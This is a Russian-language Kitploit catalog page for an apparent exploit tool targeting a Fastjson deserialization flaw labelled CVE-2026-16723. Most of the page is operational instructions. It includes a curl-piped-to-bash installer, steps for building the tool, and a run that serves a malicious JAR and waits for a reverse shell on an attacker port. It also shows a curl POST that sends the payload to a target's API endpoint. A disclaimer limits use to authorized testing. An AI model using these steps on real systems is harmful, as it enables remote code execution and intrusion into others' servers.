Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-16723 — Критическая уязвимость, затрагивающая Fastjson версии 1.2.68 – 1.2.83. | Kitploit
Инструменты/GitHubGitHub/1xpwn/cve-2026-16723
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHub1xpwn/cve-2026-16723

CVE-2026-16723

Критическая уязвимость, затрагивающая Fastjson версии 1.2.68 – 1.2.83.

Репозиторий
220 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт CVE-2026-16723

Автономная реализация на C++17 для CVE-2026-16723, критической уязвимости, затрагивающей Fastjson версий 1.2.68 – 1.2.83.

Требования

  • Linux (или WSL в Windows)

  • Компилятор, совместимый с C++17 (GCC 7+ или Clang 5+)

  • CMake 3.10 или новее

  • Системные пакеты:

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

Установка

Быстрая установка (рекомендуется)

Установите всё одной командой:

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

Или скачайте и запустите установщик вручную:

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

Сценарий установки выполнит следующее:

  • Установит все необходимые системные пакеты.

  • Скачает необходимые библиотеки, состоящие только из заголовков:

    • nlohmann/json
    • cpp-httplib
  • Соберёт проект.

  • Поместит скомпилированный бинарный файл в текущий каталог как:

root@kitploit:~
./exploit

Сборка вручную

Если вы склонировали репозиторий:

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

Или соберите вручную:

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

Использование

Запустите бинарный файл:

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

Пример

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

После выполнения будут созданы следующие файлы:

root@kitploit:~
x
body.json

HTTP-сервер запустится на настроенном порту (по умолчанию: 8000), и инструмент будет ожидать входящего обратного подключения оболочки (reverse shell).


Отправка полезной нагрузки

Отправьте сгенерированный файл body.json на уязвимую конечную точку:

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

Если приложение ожидает другое поле JSON, укажите его с помощью опции --field.


Параметры командной строки


Выходные файлы

FileDescription
xСгенерированная JAR-полезная нагрузка
body.jsonJSON-полезная нагрузка для отправки цели

Примечания

  • Этот проект предназначен только для авторизованного тестирования безопасности и образовательных целей.
  • Реализация заставляет целевое приложение загружать и подключать удалённый JAR-файл с использованием протоколов jar:http и jar:file.
  • Команда обратной оболочки кодируется в Base64, чтобы уменьшить проблемы с экранированием.

Подпишитесь на меня в Twitter (X)

  • MNM
Скачать инструмент
OptionDescriptionDefault
--lhostЛокальный IP-адресОбязательно
--lportПорт прослушивания обратной оболочки4444
--http-portПорт HTTP-сервера8000
--firstПервый файловый дескриптор для попытки3
--lastПоследний файловый дескриптор для попытки30
--fieldИмя поля JSONfacets
--outdirКаталог вывода.
-h, --helpПоказать справочное сообщение—